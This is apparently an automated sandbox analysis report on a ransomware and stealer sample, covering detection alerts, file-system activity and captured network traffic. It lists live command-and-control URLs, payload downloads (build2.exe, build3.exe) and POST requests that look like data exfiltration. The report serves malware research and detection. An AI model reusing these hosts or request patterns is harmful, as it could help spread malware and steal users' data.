            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1968989849.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987568231.0000000003741000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1966872364.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1985741698.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1987322234.0000000003732000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ta\ source: qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550839273.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550986093.00000000032D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\} source: qJKiVKZdFk.exe, 00000006.00000003.1947062173.00000000039B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\* source: qJKiVKZdFk.exe, 00000006.00000003.1930711412.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1894000882.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1821869858.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1946657694.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820899366.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550839273.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1895972920.00000000032F4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1981908169.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1913945899.00000000032F4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905966303.00000000032D9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1927966188.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1906794585.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1550986093.00000000032D9000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1988332820.00000000032F5000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1893524746.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1983051400.00000000032E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1971625636.000000000369C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986448988.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986375047.0000000003644000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970280763.000000000368D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\W source: qJKiVKZdFk.exe, 00000006.00000003.1485423577.00000000033B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ta\ source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Cc source: qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y0 source: qJKiVKZdFk.exe, 00000006.00000003.1893229623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820702656.0000000003389000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp

            Spreading

            barindex
            Infects executable files (exe, dll, sys, html)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.7:49704 -> 189.232.19.193:80
            Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.7:49702 -> 211.181.24.132:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49702 -> 211.181.24.132:80
            Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.232.19.193:80 -> 192.168.2.7:49704
            Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.232.19.193:80 -> 192.168.2.7:49703
            Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.7:49705 -> 189.232.19.193:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49705 -> 189.232.19.193:80
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199673019888
            Source: Malware configuration extractorURLs: http://cajgtus.com/test1/get.php
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 12:42:11 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 12:42:33 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 211.181.24.132 211.181.24.132
            Source: Joe Sandbox ViewIP Address: 95.217.9.149 95.217.9.149
            Source: Joe Sandbox ViewIP Address: 104.21.65.24 104.21.65.24
            Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
            Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAKKFCBFHIIEBGIDBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 7085Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: unknownTCP traffic detected without corresponding DNS query: 95.217.9.149
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
            Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
            Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331489302.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331753147.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331883438.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
            Source: global trafficDNS traffic detected: DNS query: sdfjhuz.com
            Source: global trafficDNS traffic detected: DNS query: cajgtus.com
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAKKFCBFHIIEBGIDBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
            Source: qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
            Source: qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$runh
